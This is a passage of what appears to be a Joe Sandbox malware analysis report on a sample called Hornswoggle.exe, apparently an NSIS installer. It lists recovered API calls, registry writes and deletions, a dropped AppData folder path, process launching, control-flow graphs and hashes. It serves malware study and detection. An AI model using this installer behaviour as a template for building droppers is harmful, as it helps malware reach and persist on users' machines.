                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsnA627.tmp$C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls$ExecToStack$error
                                                        • API String ID: 1941528284-2664401599
                                                        • Opcode ID: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
                                                        • Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
                                                        • Opcode Fuzzy Hash: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
                                                        • Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD

                                                        Control-flow Graph (edge list of the rendered graph; the executed / not executed colouring of the nodes is not reproduced in this text export)
                                                        control_flow_graph 623 40507c-405091 624 405147-40514b 623->624 625 405097-4050a9 623->625 626 4050b4-4050c0 lstrlenA 625->626 627 4050ab-4050af call 405e85 625->627 628 4050c2-4050d2 lstrlenA 626->628 629 4050dd-4050e1 626->629 627->626 628->624 631 4050d4-4050d8 lstrcatA 628->631 632 4050f0-4050f4 629->632 633 4050e3-4050ea SetWindowTextA 629->633 631->629 634 4050f6-405138 SendMessageA * 3 632->634 635 40513a-40513c 632->635 633->632 634->635 635->624 636 40513e-405141 635->636 636->624
                                                        APIs
                                                        • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                        • lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                        • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                        • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\
                                                        • API String ID: 2531174081-324549867
                                                        • Opcode ID: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
                                                        • Instruction ID: 0932fbc12a6b25bcac4b474ac1e4098b180b1803f9783341f4c7184ef00e87b2
                                                        • Opcode Fuzzy Hash: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
                                                        • Instruction Fuzzy Hash: 7E218C71E00508BADF119FA5CD84EDFBFA9EF04358F14807AF944A6291C7789A41CFA8

                                                        Control-flow Graph (edge list of the rendered graph; the executed / not executed colouring of the nodes is not reproduced in this text export)
                                                        control_flow_graph 637 405542-40558d CreateDirectoryA 638 405593-4055a0 GetLastError 637->638 639 40558f-405591 637->639 640 4055ba-4055bc 638->640 641 4055a2-4055b6 SetFileSecurityA 638->641 639->640 641->639 642 4055b8 GetLastError 641->642 642->640
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
                                                        • GetLastError.KERNEL32 ref: 00405599
                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
                                                        • GetLastError.KERNEL32 ref: 004055B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                        • API String ID: 3449924974-2230009264
                                                        • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                        • Instruction ID: 9e56051543debb7748005a245647f72f9f0c442d478d44b0b7514676580bb89d
                                                        • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                        • Instruction Fuzzy Hash: 2701E571D14259EAEF119BA0CD487EFBBB9EB04354F008176E905B6280D378A604CBAA

                                                        Control-flow Graph (edge list of the rendered graph; the executed / not executed colouring of the nodes is not reproduced in this text export)
                                                        control_flow_graph 643 40618e-4061ae GetSystemDirectoryA 644 4061b0 643->644 645 4061b2-4061b4 643->645 644->645 646 4061c4-4061c6 645->646 647 4061b6-4061be 645->647 649 4061c7-4061f9 wsprintfA LoadLibraryExA 646->649 647->646 648 4061c0-4061c2 647->648 648->649
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                        • wsprintfA.USER32 ref: 004061DE
                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%s.dll$UXTHEME$\
                                                        • API String ID: 2200240437-4240819195
                                                        • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                        • Instruction ID: 17d4186d305cf40b40e49104478d07e272734a7bb4b2e73e379b3f466295ecaf
                                                        • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                        • Instruction Fuzzy Hash: D1F0FC3095410567DB159768DC0DFFF365CBB08304F140176A546E51D2D574E9288B69

                                                        Control-flow Graph (edge list of the rendered graph; the executed / not executed colouring of the nodes is not reproduced in this text export)
                                                        control_flow_graph 650 401f90-401f9c 651 401fa2-401fb8 call 402a3a * 2 650->651 652 402057-402059 650->652 662 401fc7-401fd5 LoadLibraryExA 651->662 663 401fba-401fc5 GetModuleHandleA 651->663 653 4021c4-4021c9 call 401423 652->653 660 4028cf-4028de 653->660 665 401fd7-401fe4 GetProcAddress 662->665 666 402050-402052 662->666 663->662 663->665 667 402023-402028 call 40507c 665->667 668 401fe6-401fec 665->668 666->653 672 40202d-402030 667->672 669 402005-402021 668->669 670 401fee-401ffa call 401423 668->670 669->672 670->672 681 401ffc-402003 670->681 672->660 674 402036-40203e call 403783 672->674 674->660 680 402044-40204b FreeLibrary 674->680 680->660 681->672
                                                        APIs
                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                          • Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                          • Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID: error
                                                        • API String ID: 2987980305-1574812785
                                                        • Opcode ID: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
                                                        • Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
                                                        • Opcode Fuzzy Hash: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
                                                        • Instruction Fuzzy Hash: A0212E76904215FBDF217F648E48A6E3670AB45318F30423BF701B62D0D7BC4942DA6E

                                                        Control-flow Graph (edge list of the rendered graph; the executed / not executed colouring of the nodes is not reproduced in this text export)
                                                        control_flow_graph 682 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 689 4023b0-4023b8 682->689 690 4028cf-4028de 682->690 691 4023c8-4023cb 689->691 692 4023ba-4023c7 call 402a3a lstrlenA 689->692 696 4023db-4023de 691->696 697 4023cd-4023da call 402a1d 691->697 692->691 700 4023e0-4023ea call 402f5c 696->700 701 4023ef-402403 RegSetValueExA 696->701 697->696 700->701 704 402405 701->704 705 402408-4024de RegCloseKey 701->705 704->705 705->690
                                                        APIs
                                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValuelstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsnA627.tmp
                                                        • API String ID: 1356686001-2589392578
                                                        • Opcode ID: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
                                                        • Instruction ID: 5da3480c5977201a3ee5f00a5bba4dd76bcb837ef72d2191196963f4bf358416
                                                        • Opcode Fuzzy Hash: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
                                                        • Instruction Fuzzy Hash: C91175B1E00108BFEB10EFA4DE89EAF7A79EB54358F10403AF505B61D1D7B85D419B28

                                                        Control-flow Graph (edge list of the rendered graph; the executed / not executed colouring of the nodes is not reproduced in this text export)
                                                        control_flow_graph 707 405b05-405b0f 708 405b10-405b3b GetTickCount GetTempFileNameA 707->708 709 405b4a-405b4c 708->709 710 405b3d-405b3f 708->710 712 405b44-405b47 709->712 710->708 711 405b41 710->711 711->712
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405B19
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405B33
                                                        Strings
                                                        • "C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 00405B05
                                                        • nsa, xrefs: 00405B10
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-1054372161
                                                        • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                        • Instruction ID: 324d89babc139fd35718223d4ac3f7893030d86c2087b7febc7e38ed5d635a65
                                                        • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                        • Instruction Fuzzy Hash: ABF082367486086BDB109F55EC08B9BBBADDF91750F10C03BFA089A1D0D6B1B9548B59

                                                        Control-flow Graph (basic blocks of the function at 402a7a, with their successor edges)
                                                        • 713: 402a7a-402aa3 RegOpenKeyExA -> 714, 715
                                                        • 714: 402aa5-402ab0 -> 716
                                                        • 715: 402b0e-402b12 (no successors)
                                                        • 716: 402acb-402adb RegEnumKeyA -> 717, 718
                                                        • 717: 402ab2-402ab5 -> 720, 721
                                                        • 718: 402add-402aef RegCloseKey, call 4061fc -> 725, 726
                                                        • 720: 402b02-402b05 RegCloseKey -> 723
                                                        • 721: 402ab7-402ac9 call 402a7a (this function's own entry) -> 716, 718
                                                        • 723: 402b0b-402b0d -> 715
                                                        • 725: 402af1-402b00 -> 715
                                                        • 726: 402b15-402b1b -> 723, 728
                                                        • 728: 402b1d-402b2b RegDeleteKeyA -> 723, 730
                                                        • 730: 402b2d -> 715
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                        Similarity
                                                        • API ID: Close$DeleteEnumOpen
                                                        • String ID:
                                                        • API String ID: 1912718029-0
                                                        • Opcode ID: 917ca6d6ffb3dd8b327bedf28ae44dde583cf997761b7befe2e8046b2babecf8
                                                        • Instruction ID: 2c69578fec59b839bbbb6554d628e5ed2d7180fb0bd31e8d2d7d3181fb534eb1
                                                        • Opcode Fuzzy Hash: 917ca6d6ffb3dd8b327bedf28ae44dde583cf997761b7befe2e8046b2babecf8
                                                        • Instruction Fuzzy Hash: 93113D71A00108BEDF229F90DE89DAA3B7DEB54349B504436F901F10A0D775AE51EB69
                                                        APIs
                                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403703
                                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403717
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004036F6
                                                        • C:\Users\user\AppData\Local\Temp\nsnA627.tmp\, xrefs: 00403727
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsnA627.tmp\
                                                        • API String ID: 2962429428-682364331
                                                        • Opcode ID: bce50272980b2b115c412ee18181e99af888c32c9f017689cab30043875d87d7
                                                        • Instruction ID: a64c404821d2138faf7c298dc7aa4842799881c741ebf925b7f901023762ac75
                                                        • Opcode Fuzzy Hash: bce50272980b2b115c412ee18181e99af888c32c9f017689cab30043875d87d7
                                                        • Instruction Fuzzy Hash: C6E086B0500620D6C524AF7CAD855463B196B413357208322F574F30F1C338AD435EAC
                                                        APIs
                                                          • Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0,00000000), ref: 0040597C
                                                          • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
                                                          • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995
                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                          • Part of subcall function 00405542: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,000000F0), ref: 00401634
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls, xrefs: 00401629
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls
                                                        • API String ID: 1892508949-254672218
                                                        • Opcode ID: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
                                                        • Instruction ID: f000a06b92b438bb55e13d50866b264c9e4ef6e61e5cb38cc97b05dde0840845
                                                        • Opcode Fuzzy Hash: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
                                                        • Instruction Fuzzy Hash: 3F110436504151BFEF217B654C405BF27B0EA92324738467FE592B22E6C63C0A42AA3E
                                                        APIs
                                                          • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                          • Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0,00000000), ref: 0040597C
                                                          • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
                                                          • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995
                                                        • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0,00000000), ref: 00405A16
                                                        • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0), ref: 00405A26
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\
                                                        • API String ID: 3248276644-3404278061
                                                        • Opcode ID: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                                        • Instruction ID: c86e2d8d38d71570b191e9a15eff5061e4cbb4187268480765cc96090d0558f9
                                                        • Opcode Fuzzy Hash: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                                        • Instruction Fuzzy Hash: A2F07D71200D5052C73233350C4669F1644CE82374708023BF8A0B22D2D73C8D02CD7D
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                        • CloseHandle.KERNEL32(?), ref: 0040562A
                                                        Strings
                                                        • Error launching installer, xrefs: 00405607
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                        • Instruction ID: f5a249c54adfd8c255b7380a03a9b1716d63bb632b604881324be9db7dcd8e21
                                                        • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                        • Instruction Fuzzy Hash: EAE0BFB4A002097FEB109B64ED45F7B76ACEB10704F908571BD15F2160D678A9518A79
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                        • Instruction ID: 9d08257b753d1dc8d50a425e5d18a9377fc83dd762af72a05302a0d5f43d32a7
                                                        • Opcode Fuzzy Hash: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                        • Instruction Fuzzy Hash: EDA13571E00228CBDB28CFA9C8547ADBBB1FF44305F15816ED856BB281D7785A96CF44
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                        • Instruction ID: 4069c4fc72520be48e16bfd385b53c7c255c7f0e47fd3261c7dbfe51bff91a5a
                                                        • Opcode Fuzzy Hash: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
